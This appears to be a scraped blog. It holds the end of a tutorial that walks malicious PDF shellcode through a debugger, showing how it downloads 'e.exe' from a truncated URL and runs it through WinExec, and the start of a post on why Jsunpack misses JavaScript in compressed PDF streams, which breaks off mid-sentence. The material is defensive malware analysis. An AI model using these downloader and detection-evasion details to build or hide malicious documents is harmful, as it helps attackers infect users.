<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rFdD3bI8U6hFBbscYWlGQKyrt6kwcQgjG7oKOssvgEzRI7-3WwsMjnpGJF5Y-vKGo5BHvI4_mX1t82Du_Rh0KcPyYbD8HUYCBukNzQaZ0W61ITSFHGH0axGfAClglT1a1DmlWMvMYod2/s1600/Figure1-20.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rFdD3bI8U6hFBbscYWlGQKyrt6kwcQgjG7oKOssvgEzRI7-3WwsMjnpGJF5Y-vKGo5BHvI4_mX1t82Du_Rh0KcPyYbD8HUYCBukNzQaZ0W61ITSFHGH0axGfAClglT1a1DmlWMvMYod2/s400/Figure1-20.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.18 - <i>Section of shellcode loaded in Immunity Debugger</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">After
the breakpoint has been set to 0040105F we can run the program to the
breakpoint with the key “F9”. Continue to step through the program until the
instruction ADD EAX, EBX at address 00401071. Here we find the function that
the malware was searching for in the EAX register. The function is GetTempPathA
and it corresponds to the output of libemu.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPr8qLhpaYjswpE9TwFPQUlHRuMH7C0FeNavacO1OhK3OSKOI9rvaXGRWBB4XUBwrqWkeXBXj4IkmZmJVJEebCRTXoOtMgA6dVOWZDjg5M5l7tlmqCZnbWwEt9FYX37u0-Kv11MtIXGZ3/s1600/Figure1-21.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPr8qLhpaYjswpE9TwFPQUlHRuMH7C0FeNavacO1OhK3OSKOI9rvaXGRWBB4XUBwrqWkeXBXj4IkmZmJVJEebCRTXoOtMgA6dVOWZDjg5M5l7tlmqCZnbWwEt9FYX37u0-Kv11MtIXGZ3/s400/Figure1-21.PNG" width="385" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.19 - <i>Registers of shellcode.exe at address 00401071</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program and inside the function GetTempPathA it
obtains the temp folder for the system and returns the Unicode string to the
malware. Figure 1.20 displays the stack contents at the address 7C822220 which
is inside the function GetTempPathA. The value stored is “C:\DOCUME~1\Mario\LOCALS~1\Temp\”.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihFAxvo6E26MzVEYv3GTUWLQCts83cSMjFwdn0cG_fUiTFKWfhSiGXABnnY9abwwe0I14e04zKCABUWX_zYb61-LznBkoDw0S1_mIQsS2jTR2-MzSKR-IRhu9Ps69H9uQkEajKRO9mlJo4/s1600/Figure1-22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihFAxvo6E26MzVEYv3GTUWLQCts83cSMjFwdn0cG_fUiTFKWfhSiGXABnnY9abwwe0I14e04zKCABUWX_zYb61-LznBkoDw0S1_mIQsS2jTR2-MzSKR-IRhu9Ps69H9uQkEajKRO9mlJo4/s640/Figure1-22.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.19 - <i>Stack contents of shellcode.exe at address 7C822220</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program and at address 0040109E at the instruction
PUSH EAX we can see that the ESI register contains the temp address of the
system and the file name for an executable “e.exe”. This is most likely the
file the malware wants to download.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ8T8BAf8kG8VFT1Hns2SNzAZCT-qN-oUWfJXqENwZjHdu8RgAhd7FpnWYD69h532ZXiXN3w0Elfc9Gw2psQXd3cN4kuPKMimYqXZ9gadvFShNuGfxIDYr4sQ3I6I19UmftHAfCw2_Hirr/s1600/Figure1--.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ8T8BAf8kG8VFT1Hns2SNzAZCT-qN-oUWfJXqENwZjHdu8RgAhd7FpnWYD69h532ZXiXN3w0Elfc9Gw2psQXd3cN4kuPKMimYqXZ9gadvFShNuGfxIDYr4sQ3I6I19UmftHAfCw2_Hirr/s640/Figure1--.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.20 -<i> Immunity Debugger instructions and registers at the address 0040109E</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program and notice the functions that are called
by the malware. It should show the true intentions of what the malware is
trying to accomplish. A breakpoint is set at the address POP EDI to quickly
find the different functions the malware will call. This location is chosen
because it is after the hash table function that searches for a function and if
matched will display the name in the stack register.</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkXyHbTFLka7ELsPsAb0F0xznvT1gbDFzaZ1S90-SLY0YPBRr32KuYhF8aSKlGITD2KuvBu83HxVS44Ct49sp2spZPdbFtjc5xmHsIdXb3JZtjb-ZdhydansP0U3JG3X4lHGlhBFDB9_c/s1600/Figure1-23.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkXyHbTFLka7ELsPsAb0F0xznvT1gbDFzaZ1S90-SLY0YPBRr32KuYhF8aSKlGITD2KuvBu83HxVS44Ct49sp2spZPdbFtjc5xmHsIdXb3JZtjb-ZdhydansP0U3JG3X4lHGlhBFDB9_c/s640/Figure1-23.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.21 -<i> Immunity Debugger showing the function in EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second function called by the malware is GetProcAddress and this is from the
dll file kernel32. The function name can be seen in the register EAX in Figure
1.21. We continue to the next function by pressing “F9”.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFdixNBO_pq-iCMb_Abw4M0iQosu1ieEKGKE7Drt8cgG7_L987ZAl60FKINoDRi7uV_85Eabh27QyaCsGl-UW8KQRE8HGHYR-fgFVUd1RZCtPtFR1aXlhLW4c3918nTG3D147w_A7-18KP/s1600/Figure1-24.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFdixNBO_pq-iCMb_Abw4M0iQosu1ieEKGKE7Drt8cgG7_L987ZAl60FKINoDRi7uV_85Eabh27QyaCsGl-UW8KQRE8HGHYR-fgFVUd1RZCtPtFR1aXlhLW4c3918nTG3D147w_A7-18KP/s640/Figure1-24.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.22 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Above
in Figure 1.22 the third function called is stored in the EAX register. The
function is LoadLibraryA and it is also found in the kernel32.dll file. If we
further examine the function call to LoadLibrary we find that two extra libraries
are loaded into memory. First twain_32.dll and second urlmon.dll.</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Again
we execute the program to the breakpoint at 00401073 and the fourth function
called is URLDownloadToFileA from the library urlmon.dll. The function can be
seen in the EAX register in Figure 1.23.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKEplseTm1zW2hG2MGGWCtVBDn_qgtxyAWJ2g7BtcU1mpoXkBoQLjNo4vWdkALaPNFMctvTrIFDERSPuWVHdZNANzGLhuYS-nmWaukM8g6iLsba9prmGIaw9s4AORSL0EloagDgpwDrqy/s1600/Figure1-25.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKEplseTm1zW2hG2MGGWCtVBDn_qgtxyAWJ2g7BtcU1mpoXkBoQLjNo4vWdkALaPNFMctvTrIFDERSPuWVHdZNANzGLhuYS-nmWaukM8g6iLsba9prmGIaw9s4AORSL0EloagDgpwDrqy/s640/Figure1-25.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.23 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Examining
the call to URLDownloadToFileA we encounter the web address it connects to and attempts to download an executable from this URL. The address is “http://audiodr7...” and
it is the same that appeared in the hexdump of the shellcode in Figure 1.9.
Figure 1.26 shows the stack contents at the address 772BAAD3 inside the
URLDownloadToFileA function.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OIMPlpYhFCLpM1ujkjzb2aFbpRLbvD0rGWPYyzIRUoGYrD2ZisWeFwuPV70OTTgsCF7Ab4Wzgtwv_2zec05VefqJp3KgWRqLtNmoiAvWz4GXcum7Zr7rAunX-XAXcbXgqHecTU5RGMyV/s1600/Figure1-26.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OIMPlpYhFCLpM1ujkjzb2aFbpRLbvD0rGWPYyzIRUoGYrD2ZisWeFwuPV70OTTgsCF7Ab4Wzgtwv_2zec05VefqJp3KgWRqLtNmoiAvWz4GXcum7Zr7rAunX-XAXcbXgqHecTU5RGMyV/s640/Figure1-26.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.24 - <i>Stack contents at address 772BAAD3</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Again
we execute the program to the previously set breakpoint by pressing “F9” and we
obtain the fifth function called. The function WinExec from the library
kernel32 is called and the address is stored in the EAX register. After the
WinExec function is called the malware terminates and the system is infected.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgi7k-F7-q3qo8pJcW7c4ONLq-lpEr-mc19_B5RXo1Frsai4N_arPQ2Ey1zskWYCRQ27xmR9ucZad8k45WM_-vsRk9rQ-VYutziD0gocG5ktkgztzQj3qWIl5pxpWPIYxiYW8VgQS1wl7m/s1600/Figure1-27.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgi7k-F7-q3qo8pJcW7c4ONLq-lpEr-mc19_B5RXo1Frsai4N_arPQ2Ey1zskWYCRQ27xmR9ucZad8k45WM_-vsRk9rQ-VYutziD0gocG5ktkgztzQj3qWIl5pxpWPIYxiYW8VgQS1wl7m/s640/Figure1-27.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.25 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-size: large;">5. Conclusion</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Now
we have an overview of what the audiodr7 malware is trying to accomplish and
what functions the malware attempts to call. To summarize we have 5 important
functions that are called.</span></div>
<div>
<ol>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">GetTempPath
– Obtains the location of the temporary folder for the system</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">GetProcAddress
– Obtains the address of the process running</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">LoadLibraryA
– Calls this function to load two extra libraries, twain_32.dll and urlmon.dll</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">URLDownloadFileA
– Connects to audiodr7 url and downloads the file “e.exe” to temp location</span></li>
<li><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><span style="background-color: white;">WinExec
–</span> The last function called in order to execute the downloaded file “e.exe”</span></li>
</ol>
</div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
conclude, many tools exist to help aid in the analysis of malware. The
approach described above is one way to reverse engineer malware, specifically
malware that is embedded into a PDF document.</span></div>
<div>
<br /></div>
<div>
<span style="font-size: large;">6.References</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[1]
Jsunpack, Available at </span><a href="https://code.google.com/p/jsunpack-n/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">https://code.google.com/p/jsunpack-n/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[2]
SpiderMonkey, Available at </span><a href="https://developer.mozilla.org/en/SpiderMonkey" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">https://developer.mozilla.org/en/SpiderMonkey</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[3]
V8 JavaScript Engine, Available at </span><a href="http://code.google.com/p/v8/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://code.google.com/p/v8/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[4]
Michael Leigh, </span><i style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">“Malware Analyst’s
Cookbook and DVD”</i><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">, Available at</span></div>
<div>
<a href="http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[5]
Libemu – x86 Shellcode Emulation, Available at </span><a href="http://libemu.carnivore.it/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://libemu.carnivore.it/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[6]
Immunity Debugger, Available at </span><a href="http://www.immunitysec.com/products-immdbg.shtml" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://www.immunitysec.com/products-immdbg.shtml</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[7]
Shellcode 2 Exe, Available at </span><a href="http://sandsprite.com/shellcode_2_exe.php" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://sandsprite.com/shellcode_2_exe.php</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[8]
Dr. Xiang Fu, Malware Analysis Tutorial 4: Int2dh Anti-Debugging, Available at,</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> <a href="http://fumalwareanalysis.blogspot.com/2011/08/malware-analysis-tutorial-reverse_31.html" target="_blank">http://fumalwareanalysis.blogspot.com/2011/08/malware-analysis-tutorial-reverse_31.html</a></span></div>
<div>
<br /></div>Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-8501561183307667545.post-45832990837629898412012-03-27T15:02:00.000-07:002012-03-27T20:53:58.400-07:00Jsunpack Patch for Detecting PDF JavaScript<span style="font-size: large;"><b>1. Introduction</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Jsunpack
[1] is a great tool to examine the structure of a PDF and extract the embedded
JavaScript inside a document. Specifically, the python script “pdf.py”, which
is included in Jsunpack, handles the PDF document. The “pdf.py” script displays
the objects contained within a given PDF, as well as, detects embedded
JavaScript and outputs the JavaScript functions to a separate file for
analysis. However; “pdf.py” may not always detect the embedded JavaScript. An
example of a PDF document that bypasses detection is examined later. An experimental approach is followed to
figure out why jsunpack does not detect the embedded JavaScript. A solution is also
presented to patch jsunpack.</span><br />
<br />
<span style="font-size: large;"><b>2. JavaScript Detected</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">There
are two versions of a PDF document that displays “Hello World” and pops up an
alert box using JavaScript code. The first is the original version that was
manually created in notepad and it displays the contents in plain text.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu90BH4nOnZO3rwZTuQvTX3fxVhOlOq2vYdrWespoKEtdfRPLjAPGIRpGGGOS47WuCkq22xmG42YuSW_NgmkjLvx-uzfEqipwhzzLUcNEq-d82_EkhDXwy4djyCgpZWMjMevG_U7ZNiz64/s1600/Figure1-1(1).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu90BH4nOnZO3rwZTuQvTX3fxVhOlOq2vYdrWespoKEtdfRPLjAPGIRpGGGOS47WuCkq22xmG42YuSW_NgmkjLvx-uzfEqipwhzzLUcNEq-d82_EkhDXwy4djyCgpZWMjMevG_U7ZNiz64/s640/Figure1-1(1).PNG" width="393" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Fzegw1V1HlHMVuXq6oUHY6APmhubTahxsgaZgwjD5LLKs2qJOqpm3ARhdFPOKr3OVBtt8x-55J8hs6hrD7zfhQPnuItHfblHdsO-GoT-yUbOrgDOTGYUIlQ619B3r_qSkHlao3znLLaA/s1600/Figure1-1(2).PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Fzegw1V1HlHMVuXq6oUHY6APmhubTahxsgaZgwjD5LLKs2qJOqpm3ARhdFPOKr3OVBtt8x-55J8hs6hrD7zfhQPnuItHfblHdsO-GoT-yUbOrgDOTGYUIlQ619B3r_qSkHlao3znLLaA/s640/Figure1-1(2).PNG" width="404" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - <i>Version 1 of the uncompressed pdf document labeled "works_original.pdf"</i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Notepad++
is used to view the contents of the original PDF document shown in <i>Figure 1-1</i>.We can see there are two
objects with JavaScript tags; object 6 and object 8. Object 8 contains the
actual JavaScript code to produce the alert box which displays, “This is my
alert box”. We expect pdf.py to detect the JavaScript in object 6 and 8 and it
does! <i>Figure 1-2</i> shows a partial output of pdf.py executed with the original
PDF as the input file.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2dZmHUmgdoXBMpuwT_2GQ2UnDF0wNAXYHoHq1UkdkH_w5ImhA85256Sjzz7SJ0bQtqj8N3_UcJFLJ9kGYziyrBt2QoA0UrmAl1NG0txxejfuVDRVA9qt4aFCF-Ofmd0k6fHN-3peM-VIv/s1600/Figure1-2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2dZmHUmgdoXBMpuwT_2GQ2UnDF0wNAXYHoHq1UkdkH_w5ImhA85256Sjzz7SJ0bQtqj8N3_UcJFLJ9kGYziyrBt2QoA0UrmAl1NG0txxejfuVDRVA9qt4aFCF-Ofmd0k6fHN-3peM-VIv/s640/Figure1-2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 - <i>Output of pdf.py executed with version 1 of the pdf document (works_original.pdf)</i> </td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
original PDF document is labeled “works_original.pdf” since it is detected by
pdf.py as containing JavaScript.</span><br />
<br />
<span style="font-size: large;"><b>3. Javascript Not Detected</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second document is a compressed version of the “works_original.pdf” file. The
second version uses FlateDecode to compress the streams. When the “works_original.pdf”
is saved in Adobe Acrobat Professional 9, the application automatically compresses and
converts the original version to the compressed version. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Pdf.py
can be used to examine the contents. We can see that the structure of the PDF
has been modified. New objects are created in the document that did not exist
in the “works_original.pdf”. The compressed version is labeled “notwork.pdf”
since the JavaScript is not detected by pdf.py. <i>Figure 1.3</i> is the output from pdf.py
with the compressed version (notwork.pdf) as the input.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdlrOugQnIhaB2GNsfq7oDN9Da4WuABtWYFS5qiR6XC2CJ6cF4olFE-S8LekDC9HtNbsYjN3z8RR6mHLKPoh7iBrZ0bfpz6nbbZ_LV3WmMzeiIM55O9n2ZLggEDZHSvkIu1eebA0JVKAGt/s1600/Figure1-3%25281%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdlrOugQnIhaB2GNsfq7oDN9Da4WuABtWYFS5qiR6XC2CJ6cF4olFE-S8LekDC9HtNbsYjN3z8RR6mHLKPoh7iBrZ0bfpz6nbbZ_LV3WmMzeiIM55O9n2ZLggEDZHSvkIu1eebA0JVKAGt/s640/Figure1-3%25281%2529.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitN9LXsNjCxOYmg6wHukGRyRNbEX2UR9zQ3mlgufp6-5ShXBOZbuXeCFaPDslWqo2GQ0lJE87hhTZ0ogpY7vDm7Wid9pHC6eydLCrsKxTkwGIio4l9UnKl3BAB86lkJowmI3mNYR3qe8hU/s1600/Figure1-3%25282%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitN9LXsNjCxOYmg6wHukGRyRNbEX2UR9zQ3mlgufp6-5ShXBOZbuXeCFaPDslWqo2GQ0lJE87hhTZ0ogpY7vDm7Wid9pHC6eydLCrsKxTkwGIio4l9UnKl3BAB86lkJowmI3mNYR3qe8hU/s640/Figure1-3%25282%2529.PNG" width="640" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RKKd4TB5EnrV1CzQahFizEiVBQvHBOpVbF1lFN8HhVdHiKD5aBus8ycdW1TsmwtDzfFUQjAayydU44DvKMYJDm2LwGNoSl3sECC9C3eSYEoSCzEM49gqh_eVk7t_V0fyLL09ncU4tgbP/s1600/Figure1-3%25283%2529.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RKKd4TB5EnrV1CzQahFizEiVBQvHBOpVbF1lFN8HhVdHiKD5aBus8ycdW1TsmwtDzfFUQjAayydU44DvKMYJDm2LwGNoSl3sECC9C3eSYEoSCzEM49gqh_eVk7t_V0fyLL09ncU4tgbP/s640/Figure1-3%25283%2529.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 - <i>Output of pdf.py executed with version 2 of the pdf document (notwork.pdf)</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">A
couple of interesting results can be seen from the figure above. First and most
importantly, no JavaScript is detected in the compressed file. Second, all the
objects are not displayed and references are included to objects that do not
appear in the output. For example, object 8 has a tag “/Names” which refers to
an object 13 that is not visible. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
get a better idea of what is going on and what is contained in the compressed
streams, the tool pdfstreamdumper<span style="background-color: white;"> </span></span><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[2]</span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><span style="background-color: white;"> i</span>s used. This tool decompresses all the streams that have
been encoded with filters like “FlateDecode” and presents the text in a graphical
user interface.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNNUvg0N0VUAiDOQpx0l340chv2QNvV4dgygXpGnmRzg_2j5zbzTjaUtK6cWASWfIlr7LUKqMps65x3g8TupyNi6DCES8LzduFpCOzupuEB5oS6Th8pRK6r0kk8JRsKeddS_1UVsa1Z8Q/s1600/Figure+1-4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNNUvg0N0VUAiDOQpx0l340chv2QNvV4dgygXpGnmRzg_2j5zbzTjaUtK6cWASWfIlr7LUKqMps65x3g8TupyNi6DCES8LzduFpCOzupuEB5oS6Th8pRK6r0kk8JRsKeddS_1UVsa1Z8Q/s200/Figure+1-4.PNG" width="125" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 - <i>Objects listed by Pdfstreamdumper for the notwork.pdf</i> </td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Pdfstreamdumper
provides a list of objects contained in the PDF and is displayed in <i>Figure 1.4</i>. The list is consistent with
the output that “pdf.py” returns so where are the missing objects? If we
examine each object and its contents we discover the missing objects are contained
within other objects. For example, object 10 contains object 13, 14, 15 and 16.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR1_bvyg7xV9mf7ljfcWoVCzCwMZynHlcSWUSqdYqBe2_aGAhMn4gFCqpzPWc3CIWCLdZHdGor2CzAFy6PXWQ3tMd_114HlvBht_dLlLRTkzuonThmkAACEzLcGsWF2-R2NZqiFG9aB0yB/s1600/Figure+1-5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR1_bvyg7xV9mf7ljfcWoVCzCwMZynHlcSWUSqdYqBe2_aGAhMn4gFCqpzPWc3CIWCLdZHdGor2CzAFy6PXWQ3tMd_114HlvBht_dLlLRTkzuonThmkAACEzLcGsWF2-R2NZqiFG9aB0yB/s640/Figure+1-5.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 - <i>Contents of object 10 shown by Pdfstreamdumper for the notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
